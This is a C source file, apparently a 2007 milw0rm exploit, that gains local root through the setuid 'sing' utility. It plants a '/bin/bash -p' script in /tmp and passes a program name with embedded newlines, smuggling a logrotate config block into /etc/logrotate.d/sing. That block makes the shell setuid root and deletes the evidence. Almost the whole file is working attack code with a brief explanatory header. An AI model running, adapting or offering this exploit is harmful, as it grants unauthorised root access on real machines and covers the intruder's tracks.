/*
 sing file append exploit
 by bannedit

 12/05/2007

 The original reporter of this issue included an example session which
 added an account to the machine.

 The method for this exploit is slightly different and much more
 quiet. Although it relies upon logrotate for help.

 This could easily be modified to work with cron daemons which
 are not too strict about the cron file format. However,
 when I tested vixie cron it appears that there are
 better checks for file format compilance these days.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define SING_PATH "/usr/bin/sing"

char *file = "/etc/logrotate.d/sing";
char *evilname = "\n/tmp/sing {\n    daily\n    size=0\n    firstaction\n        chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n    endscript\n}\n\n\n";



int main()
{
FILE *fp;
int pid;

        puts("sing file append exploit");
        puts("------------------------");
        puts("by bannedit");

        if(fp = fopen("/tmp/shell", "w+"))
        {
           fputs("#!/bin/bash\n", fp);
           fputs("/bin/bash -p", fp);
           fclose(fp);
           system("touch /tmp/sing; echo garbage >> /tmp/sing");
        }
        else
        {
           puts("error making shell file");
           exit(-1);
        }

        sleep(5);
        printf("done sleeping...\n");
        execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0);
        return 0;
}

// milw0rm.com [2007-12-06]